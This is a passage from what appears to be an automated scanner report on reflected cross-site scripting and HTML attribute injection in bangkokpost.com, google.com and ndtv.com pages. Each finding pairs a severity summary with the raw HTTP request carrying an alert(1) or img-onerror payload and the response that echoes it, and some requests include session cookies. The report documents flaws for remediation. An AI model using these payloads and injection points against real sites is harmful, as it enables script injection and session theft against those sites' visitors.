Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1; verify=test

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:29:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 191
Content-Type: text/html; charset=utf-8

<ol class="rankVote">
<li><a href="/travel/search">See all</a> or <a href="/travel/search/geography/Bangkok & greater15b68<script>alert(1)</script>7ad9cf98271">search location</a></li>
</ol>

6.188. http://www.bangkokpost.com/_getContent_main.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /_getContent_main.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 136aa<script>alert(1)</script>3dec168d7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_getContent_main.php?cate_path=,,5,,37,,&sortBy=lasted&orderBy=&limitPerPage=2&geography=Bangkok+%26+gre/136aa<script>alert(1)</script>3dec168d7dater HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.1.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _cbclose62518=1; _uid62518=2BAEE501.1; _ctout62518=1; verify=test

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 191
Content-Type: text/html; charset=utf-8

<ol class="rankVote">
<li><a href="/travel/search">See all</a> or <a href="/travel/search/geography/Bangkok & gre/136aa<script>alert(1)</script>3dec168d7dater">search location</a></li>
</ol>

6.189. http://www.bangkokpost.com/forum/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfcc3"-alert(1)-"5797c7631a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/search.php/dfcc3"-alert(1)-"5797c7631a0 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<SCRIPT LANGUAGE="javascript1.1"> __th_page="forum-dfcc3"-alert(1)-"5797c7631a0";</SCRIPT>
...[SNIP]...

6.190. http://www.bangkokpost.com/forum/viewforum.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewforum.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 501aa"-alert(1)-"565b86ed7f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/viewforum.php/501aa"-alert(1)-"565b86ed7f1 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<SCRIPT LANGUAGE="javascript1.1"> __th_page="forum-501aa"-alert(1)-"565b86ed7f1";</SCRIPT>
...[SNIP]...

6.191. http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6115c"-alert(1)-"eaae86af2cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/viewtopic.php/6115c"-alert(1)-"eaae86af2cb HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<SCRIPT LANGUAGE="javascript1.1"> __th_page="forum-6115c"-alert(1)-"eaae86af2cb";</SCRIPT>
...[SNIP]...

6.192. http://www.bangkokpost.com/search/news-and-article [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /search/news-and-article

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e167"><script>alert(1)</script>b6a9188d29d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/news-and-article2e167"><script>alert(1)</script>b6a9188d29d HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:25:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post :
...[SNIP]...
<a class="bluelink" href="http://member.bangkokpost.com/login.php?serviceID=10006&ref=http://www.bangkokpost.com/search/news-and-article2e167"><script>alert(1)</script>b6a9188d29d">
...[SNIP]...

6.193. http://www.bangkokpost.com/search/news-and-article [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /search/news-and-article

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48a59"><script>alert(1)</script>5d22f1154a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/news-and-article?48a59"><script>alert(1)</script>5d22f1154a2=1 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:24:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thailand's Sear
...[SNIP]...
<a class="bluelink" href="http://member.bangkokpost.com/login.php?serviceID=10006&ref=http://www.bangkokpost.com/search/news-and-article?48a59"><script>alert(1)</script>5d22f1154a2=1">
...[SNIP]...

6.194. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b190(a)a90e6ffcc75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?2b190(a)a90e6ffcc75=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:30:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
",d,k)};})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?2b190(a)a90e6ffcc75\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

6.195. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f571"><img%20src%3da%20onerror%3dalert(1)>f4bb9e94911 was submitted in the REST URL parameter 2. This input was echoed as 6f571"><img src=a onerror=alert(1)>f4bb9e94911 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /article/cities6f571"><img%20src%3da%20onerror%3dalert(1)>f4bb9e94911/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:52:51 GMT
Date: Sun, 04 Sep 2011 04:42:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/article/cities6f571"><img src=a onerror=alert(1)>f4bb9e94911/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003" />
...[SNIP]...

6.196. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ndtv.com
Path:   /article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553b4"%20a%3db%2019d0503a308 was submitted in the REST URL parameter 3. This input was echoed as 553b4" a=b 19d0503a308 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /article/cities/553b4"%20a%3db%2019d0503a308 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=574
Expires: Sun, 04 Sep 2011 04:52:36 GMT
Date: Sun, 04 Sep 2011 04:43:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/article/cities/553b4" a=b 19d0503a308" />
...[SNIP]...

6.197. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ead0"><img%20src%3da%20onerror%3dalert(1)>94d6127d4a4 was submitted in the REST URL parameter 2. This input was echoed as 2ead0"><img src=a onerror=alert(1)>94d6127d4a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /article/cities2ead0"><img%20src%3da%20onerror%3dalert(1)>94d6127d4a4/mumbai-airports-main-runway-still-shut-flights-delayed-131003 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:52:51 GMT
Date: Sun, 04 Sep 2011 04:42:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71655

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/article/cities2ead0"><img src=a onerror=alert(1)>94d6127d4a4/mumbai-airports-main-runway-still-shut-flights-delayed-131003" />
...[SNIP]...

6.198. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a976"><img%20src%3da%20onerror%3dalert(1)>1e77da311f0 was submitted in the REST URL parameter 2. This input was echoed as 6a976"><img src=a onerror=alert(1)>1e77da311f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /article/india6a976"><img%20src%3da%20onerror%3dalert(1)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 69830
Cache-Control: max-age=115
Expires: Sun, 04 Sep 2011 02:34:35 GMT
Date: Sun, 04 Sep 2011 02:32:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/article/india6a976"><img src=a onerror=alert(1)>1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142" />
...[SNIP]...

6.199. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ndtv.com
Path:   /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26866"a%3d"b"d90e4e2218c was submitted in the REST URL parameter 3. This input was echoed as 26866"a="b"d90e4e2218c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /article/india/26866"a%3d"b"d90e4e2218c HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 70480
Cache-Control: max-age=557
Expires: Sun, 04 Sep 2011 02:42:09 GMT
Date: Sun, 04 Sep 2011 02:32:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/article/india/26866"a="b"d90e4e2218c" />
...[SNIP]...

6.200. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b117"><img%20src%3da%20onerror%3dalert(1)>aaf038d2b32 was submitted in the REST URL parameter 2. This input was echoed as 1b117"><img src=a onerror=alert(1)>aaf038d2b32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /article/india1b117"><img%20src%3da%20onerror%3dalert(1)>aaf038d2b32/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68824
Cache-Control: max-age=583
Expires: Sun, 04 Sep 2011 03:36:44 GMT
Date: Sun, 04 Sep 2011 03:27:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/article/india1b117"><img src=a onerror=alert(1)>aaf038d2b32/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917" />
...[SNIP]...

6.201. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4694"><img%20src%3da%20onerror%3dalert(1)>8865830768c was submitted in the REST URL parameter 3. This input was echoed as a4694"><img src=a onerror=alert(1)>8865830768c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/flashbacka4694"><img%20src%3da%20onerror%3dalert(1)>8865830768c/flashback-the-magic-of-rishi-kapoor/209786 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:54:01 GMT
Date: Sun, 04 Sep 2011 04:44:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137639

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/flashbacka4694"><img src=a onerror=alert(1)>8865830768c/flashback-the-magic-of-rishi-kapoor/209786" />
...[SNIP]...

6.202. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba97"><img%20src%3da%20onerror%3dalert(1)>057d7d2bf01 was submitted in the REST URL parameter 4. This input was echoed as 4ba97"><img src=a onerror=alert(1)>057d7d2bf01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/flashback/flashback-the-magic-of-rishi-kapoor4ba97"><img%20src%3da%20onerror%3dalert(1)>057d7d2bf01/209786 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=595
Expires: Sun, 04 Sep 2011 04:54:07 GMT
Date: Sun, 04 Sep 2011 04:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137639

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor4ba97"><img src=a onerror=alert(1)>057d7d2bf01/209786" />
...[SNIP]...

